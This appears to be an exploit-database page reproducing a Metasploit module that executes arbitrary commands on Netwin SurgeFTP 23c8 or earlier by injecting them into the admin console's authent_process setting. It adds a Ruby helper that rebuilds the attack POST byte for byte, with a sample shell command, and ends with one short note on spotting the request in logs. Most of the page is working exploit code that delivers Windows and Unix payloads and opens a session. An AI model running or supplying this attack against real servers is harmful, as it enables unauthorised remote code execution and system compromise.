
Netwin SurgeFTP Remote Command Execution

Published: 21 Dec 2012 22:10:27
Reported by: Spencer McIntyre, sinn3r
Type: metasploit
Source: www.rapid7.com

Netwin SurgeFTP Remote Command Execution. This module exploits a vulnerability in Netwin SurgeFTP version 23c8 or prior: a command submitted as the authentication-process setting (the authent_process field) of the web-based administrative console is executed by the FTP service. Valid credentials for the administrative console (TCP port 7021 by default) are required.

Code
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Netwin SurgeFTP Remote Command Execution',
      'Description'    => %q{
          This module exploits a vulnerability found in Netwin SurgeFTP, version 23c8
        or prior. The authentication-process setting of the web-based administrative
        console is run as a command by the FTP service. Valid credentials for the
        administrative console are required.
      },
      'Author'         =>
        [
          'Spencer McIntyre',  # Discovery
          'sinn3r'
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '89105' ],
          [ 'EDB', '23522' ]
        ],
      'Platform'       => %w{ win unix },
      'Targets'        =>
        [
          [ 'Windows', { 'Arch'=>ARCH_X86, 'Platform'=>'win', 'CmdStagerFlavor' => 'vbs'}  ],
          [ 'Unix',    { 'Arch'=>ARCH_CMD, 'Platform'=>'unix', 'Payload'=>{'BadChars' => "\x22"}} ]
        ],
      'DisclosureDate' => '2012-12-06',
      'Notes'          =>
        {
          'Stability'   => [ CRASH_SAFE, ],
          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS, ],
          'Reliability' => [ REPEATABLE_SESSION, ],
        },
    ))

    register_options(
      [
        Opt::RPORT(7021),
        OptString.new('HttpUsername', [ true, 'The username with admin role to authenticate as', 'admin' ]),
        OptString.new('HttpPassword', [ true, 'The password for the specified username', 'password' ])
      ])
  end

  # Fingerprint the manager CGI with an unauthenticated GET; the page title
  # identifies SurgeFTP but not its version, hence Detected rather than Appears.
  def check
    res = send_request_raw({'uri'=>'/cgi/surgeftpmgr.cgi'})
    if res and res.body =~ /surgeftp\x20\x0d\x0a\x20\x20Manager CGI/
      return Exploit::CheckCode::Detected
    else
      return Exploit::CheckCode::Safe
    end
  end

  # Called by the CmdStager mixin for each stager line (Windows target only).
  def execute_command(cmd, opts)
    http_send_command("cmd.exe /q /c #{cmd}")
  end

  # Submit the global settings form with the command in authent_process;
  # every other field is left blank and the save button coordinates are sent
  # so the CGI treats the request as a "save" click.
  def http_send_command(command)
    res = send_request_cgi(
    {
      'uri'     => '/cgi/surgeftpmgr.cgi',
      'method'  => 'POST',
      'authorization' => basic_auth(datastore['HttpUsername'], datastore['HttpPassword']),
      'vars_post' =>
        {
          'global_smtp' => "",
          'global_restart' => "",
          'global_style' => "",
          'global_bind' => "",
          'global_passive_ip' => "",
          'global_passive_match' => "",
          'global_logon_mode' => "",
          'global_log_host' => "",
          'global_login_error' => "",
          'global_adminip' => "",
          'global_total_users' => "",
          'global_con_perip' => "",
          'global_ssl' => "",
          'global_ssl_cipher_list' => "",
          'global_implicit_port' => "",
          'log_level' => "",
          'log_home' => "",
          'global_watcher_program_ul' => "",
          'global_watcher_program_dl' => "",
          'authent_process' => command,
          'authent_cmdopts' => "",
          'authent_number' => "",
          'authent_domain' => "",
          'global_strip_user_domain' => "",
          'global_noclass' => "",
          'global_anon_hammer_over_time' => "",
          'global_anon_hammer_max' => "",
          'global_anon_hammer_block_time' => "",
          'global_port' => "",
          'global_mgr_port' => "",
          'global_mgr_ssl_port' => "",
          'cmd_global_save.x' => "36",
          'cmd_global_save.y' => "8",
        }
    })

    if res and res.body =~ /401 Authorization failed/
      fail_with(Failure::NoAccess, "Unable to log in!")
    elsif not (res and res.code == 200)
      fail_with(Failure::Unknown, 'Failed to execute command.')
    end
  end

  def exploit
    case target['Platform']
    when 'win'
      print_status("#{rhost}:#{rport} - Sending command stager...")
      execute_cmdstager({:linemax=>500})

    when 'unix'
      print_status("#{rhost}:#{rport} - Sending payload...")
      http_send_command(%Q|/bin/sh -c "#{payload.encoded}"|)
    end

    handler
  end
end
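The module above hides the actual HTTP exchange behind Metasploit's HttpClient and CmdStager mixins. The following is an added example, not part of the Metasploit module or of the Rapid7 code base: it builds the same POST to /cgi/surgeftpmgr.cgi byte for byte (same field order, Basic auth header, command in authent_process, save-button coordinates), applies the module's own response checks, and enforces the BadChars restriction that explains why the Unix target forbids a double quote (the payload is wrapped in /bin/sh -c "..."). The host, port, credentials and commands in the block are assumed values for illustration; nothing is sent on the network.

```ruby
require 'uri'

# Added example (not the Metasploit module's code): reproduce the request the
# module sends and the checks it applies, so the exchange can be examined
# offline. Host, port, credentials and commands below are assumptions.
module SurgeFtpRce
  MANAGER_URI = '/cgi/surgeftpmgr.cgi'

  # Form fields the module submits before authent_process, all blank.
  LEADING_BLANK_FIELDS = %w[
    global_smtp global_restart global_style global_bind global_passive_ip
    global_passive_match global_logon_mode global_log_host global_login_error
    global_adminip global_total_users global_con_perip global_ssl
    global_ssl_cipher_list global_implicit_port log_level log_home
    global_watcher_program_ul global_watcher_program_dl
  ].freeze

  # Form fields submitted after authent_process, all blank.
  TRAILING_BLANK_FIELDS = %w[
    authent_cmdopts authent_number authent_domain global_strip_user_domain
    global_noclass global_anon_hammer_over_time global_anon_hammer_max
    global_anon_hammer_block_time global_port global_mgr_port
    global_mgr_ssl_port
  ].freeze

  # Unix target: the payload is embedded in a double-quoted sh -c string, so a
  # literal double quote would end the string early. This mirrors the module's
  # 'BadChars' => "\x22" restriction by rejecting such payloads up front.
  def self.unix_command(payload)
    raise ArgumentError, 'payload must not contain a double quote' if payload.include?('"')
    %(/bin/sh -c "#{payload}")
  end

  # Windows target: each command stager line is run through cmd.exe.
  def self.windows_command(cmd)
    "cmd.exe /q /c #{cmd}"
  end

  # URL-encoded form body in the module's field order, command in authent_process.
  def self.form_body(command)
    pairs = LEADING_BLANK_FIELDS.map { |k| [k, ''] }
    pairs << ['authent_process', command]
    pairs.concat(TRAILING_BLANK_FIELDS.map { |k| [k, ''] })
    pairs << ['cmd_global_save.x', '36']
    pairs << ['cmd_global_save.y', '8']
    URI.encode_www_form(pairs)
  end

  # Full HTTP/1.1 POST as it would appear on the wire (CRLF line endings).
  # pack('m0') is strict Base64 without newlines, same as basic_auth() produces.
  def self.build_request(host, port, username, password, command)
    body = form_body(command)
    auth = ["#{username}:#{password}"].pack('m0')
    [
      "POST #{MANAGER_URI} HTTP/1.1",
      "Host: #{host}:#{port}",
      "Authorization: Basic #{auth}",
      'Content-Type: application/x-www-form-urlencoded',
      "Content-Length: #{body.bytesize}",
      '',
      body
    ].join("\r\n")
  end

  # Same fingerprint the module's check method applies to the GET response.
  def self.manager_detected?(body)
    !!(body =~ /surgeftp\x20\x0d\x0a\x20\x20Manager CGI/)
  end

  # Same three-way outcome as the module's http_send_command:
  # :no_access (bad credentials), :unknown_failure (non-200), :command_sent.
  def self.classify_response(code, body)
    return :no_access if body =~ /401 Authorization failed/
    return :unknown_failure unless code == 200
    :command_sent
  end
end

if $PROGRAM_NAME == __FILE__
  # Assumed target and credentials; prints the request without sending it.
  cmd = SurgeFtpRce.unix_command('id > /tmp/surgeftp_test')
  puts SurgeFtpRce.build_request('192.0.2.10', 7021, 'admin', 'password', cmd)
end
```

The response classifier is worth noting for defenders as well: a successful request returns 200 even though the command only runs when the FTP service next invokes its authentication process, so a 200 from this CGI with a non-empty authent_process is the artefact to look for in the manager's access logs.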
